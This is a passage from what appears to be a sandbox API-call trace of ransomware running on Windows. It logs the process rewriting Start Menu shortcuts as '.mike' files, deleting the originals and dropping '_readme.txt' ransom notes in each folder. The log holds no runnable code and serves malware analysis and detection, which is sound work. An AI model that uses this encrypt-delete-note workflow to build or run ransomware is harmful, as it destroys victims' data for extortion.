Explorer.lnk", dwFileAttributes=0x80) returned 1 [0158.874] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk")) returned 1 [0158.875] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.876] GetFileType (hFile=0x1c8) returned 0x1 [0158.876] GetFileType (hFile=0x1c8) returned 0x1 [0158.877] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.877] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.878] CoTaskMemFree (pv=0x508980) [0158.880] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.882] GetFileType (hFile=0x1c8) returned 0x1 [0158.882] GetFileType (hFile=0x1c8) returned 0x1 [0158.882] CloseHandle (hObject=0x1c8) returned 1 [0158.882] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0158.883] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.884] GetFileType (hFile=0x1c8) returned 0x1 [0158.884] GetFileType (hFile=0x1c8) returned 0x1 [0158.884] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x0 [0158.885] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.885] GetFileType (hFile=0x1c8) returned 0x1 [0158.886] GetFileType (hFile=0x1c8) returned 0x1 [0158.886] ReadFile (in: hFile=0x1c8, lpBuffer=0x2294e30, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef60, lpOverlapped=0x0 | out: lpBuffer=0x2294e30*, lpNumberOfBytesRead=0x2aef60*=0x500, lpOverlapped=0x0) returned 1 [0158.889] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.889] GetFileType (hFile=0x1c8) returned 0x1 [0158.889] GetFileType (hFile=0x1c8) returned 0x1 [0158.889] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x220 [0158.890] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.890] GetFileType (hFile=0x1c8) returned 0x1 [0158.890] GetFileType (hFile=0x1c8) returned 0x1 [0158.892] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk", dwFileAttributes=0x80) returned 1 [0158.892] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk")) returned 1 [0158.893] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.894] GetFileType (hFile=0x1c8) returned 0x1 [0158.894] GetFileType (hFile=0x1c8) returned 0x1 [0158.895] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.898] GetFileType (hFile=0x1c8) returned 0x1 [0158.898] GetFileType (hFile=0x1c8) returned 0x1 [0158.898] CloseHandle (hObject=0x1c8) returned 1 [0158.899] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0158.899] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.900] GetFileType (hFile=0x1c8) returned 0x1 [0158.900] GetFileType (hFile=0x1c8) returned 0x1 [0158.900] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x0 [0158.902] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.902] GetFileType (hFile=0x1c8) returned 0x1 [0158.902] GetFileType (hFile=0x1c8) returned 0x1 [0158.902] ReadFile (in: hFile=0x1c8, lpBuffer=0x22a79f4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef60, lpOverlapped=0x0 | out: lpBuffer=0x22a79f4*, lpNumberOfBytesRead=0x2aef60*=0x518, lpOverlapped=0x0) returned 1 [0158.904] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.905] GetFileType (hFile=0x1c8) returned 0x1 [0158.905] GetFileType (hFile=0x1c8) returned 0x1 [0158.905] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x220 [0158.905] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.906] GetFileType (hFile=0x1c8) returned 0x1 [0158.906] GetFileType (hFile=0x1c8) returned 0x1 [0158.907] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk", dwFileAttributes=0x80) returned 1 [0158.908] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk")) returned 1 [0158.909] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.910] GetFileType (hFile=0x1c8) returned 0x1 [0158.910] GetFileType (hFile=0x1c8) returned 0x1 [0158.911] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.912] GetFileType (hFile=0x1c8) returned 0x1 [0158.912] GetFileType (hFile=0x1c8) returned 0x1 [0158.912] CloseHandle (hObject=0x1c8) returned 1 [0158.913] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0158.913] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.914] GetFileType (hFile=0x1c8) returned 0x1 [0158.914] GetFileType (hFile=0x1c8) returned 0x1 [0158.914] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x0 [0158.915] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.916] GetFileType (hFile=0x1c8) returned 0x1 [0158.916] GetFileType (hFile=0x1c8) returned 0x1 [0158.916] ReadFile (in: hFile=0x1c8, lpBuffer=0x22b8cb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef60, lpOverlapped=0x0 | out: lpBuffer=0x22b8cb8*, lpNumberOfBytesRead=0x2aef60*=0x106, lpOverlapped=0x0) returned 1 [0158.917] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.918] GetFileType (hFile=0x1c8) returned 0x1 [0158.918] GetFileType (hFile=0x1c8) returned 0x1 [0158.918] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x220 [0158.918] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.919] GetFileType (hFile=0x1c8) returned 0x1 [0158.919] GetFileType (hFile=0x1c8) returned 0x1 [0158.920] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk", dwFileAttributes=0x80) returned 1 [0158.921] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk")) returned 1 [0158.922] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.923] GetFileType (hFile=0x1c8) returned 0x1 [0158.923] GetFileType (hFile=0x1c8) returned 0x1 [0158.924] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.925] GetFileType (hFile=0x1c8) returned 0x1 [0158.925] GetFileType (hFile=0x1c8) returned 0x1 [0158.925] CloseHandle (hObject=0x1c8) returned 1 [0158.925] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0158.926] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.927] GetFileType (hFile=0x1c8) returned 0x1 [0158.927] GetFileType (hFile=0x1c8) returned 0x1 [0158.927] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x0 [0158.928] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.928] GetFileType (hFile=0x1c8) returned 0x1 [0158.928] GetFileType (hFile=0x1c8) returned 0x1 [0158.929] ReadFile (in: hFile=0x1c8, lpBuffer=0x22c897c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef60, lpOverlapped=0x0 | out: lpBuffer=0x22c897c*, lpNumberOfBytesRead=0x2aef60*=0x4cc, lpOverlapped=0x0) returned 1 [0158.931] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.931] GetFileType (hFile=0x1c8) returned 0x1 [0158.931] GetFileType (hFile=0x1c8) returned 0x1 [0158.931] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeea8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeea8*=0) returned 0x220 [0158.932] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.932] GetFileType (hFile=0x1c8) returned 0x1 [0158.932] GetFileType (hFile=0x1c8) returned 0x1 [0158.933] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk", dwFileAttributes=0x80) returned 1 [0158.934] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk")) returned 1 [0158.935] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.936] GetFileType (hFile=0x1c8) returned 0x1 [0158.937] GetFileType (hFile=0x1c8) returned 0x1 [0158.938] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0158.938] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0158.938] CoTaskMemFree (pv=0x508980) [0158.940] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.942] GetFileType (hFile=0x1c8) returned 0x1 [0158.942] GetFileType (hFile=0x1c8) returned 0x1 [0158.942] CloseHandle (hObject=0x1c8) returned 1 [0158.943] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0158.944] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.944] GetFileType (hFile=0x1c8) returned 0x1 [0158.944] GetFileType (hFile=0x1c8) returned 0x1 [0158.944] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x0 [0158.946] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.946] GetFileType (hFile=0x1c8) returned 0x1 [0158.946] GetFileType (hFile=0x1c8) returned 0x1 [0158.946] ReadFile (in: hFile=0x1c8, lpBuffer=0x22e11d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aef18, lpOverlapped=0x0 | out: lpBuffer=0x22e11d8*, lpNumberOfBytesRead=0x2aef18*=0x54e, lpOverlapped=0x0) returned 1 [0158.958] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.958] GetFileType (hFile=0x1c8) returned 0x1 [0158.959] GetFileType (hFile=0x1c8) returned 0x1 [0158.959] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x220 [0158.959] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.960] GetFileType (hFile=0x1c8) returned 0x1 [0158.960] GetFileType (hFile=0x1c8) returned 0x1 [0158.961] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk", dwFileAttributes=0x80) returned 1 [0158.961] DeleteFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk")) returned 1 [0158.963] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\_readme.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0158.963] GetFileType (hFile=0x1c8) returned 0x1 [0158.963] GetFileType (hFile=0x1c8) returned 0x1 [0158.964] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.965] GetFileType (hFile=0x1c8) returned 0x1 [0158.965] GetFileType (hFile=0x1c8) returned 0x1 [0158.965] CloseHandle (hObject=0x1c8) returned 1 [0158.966] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0158.967] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.mike" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0158.967] GetFileType (hFile=0x1c8) returned 0x1 [0158.967] GetFileType (hFile=0x1c8) returned 0x1 [0158.967] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aee60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aee60*=0) returned 0x0 [0158.970] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 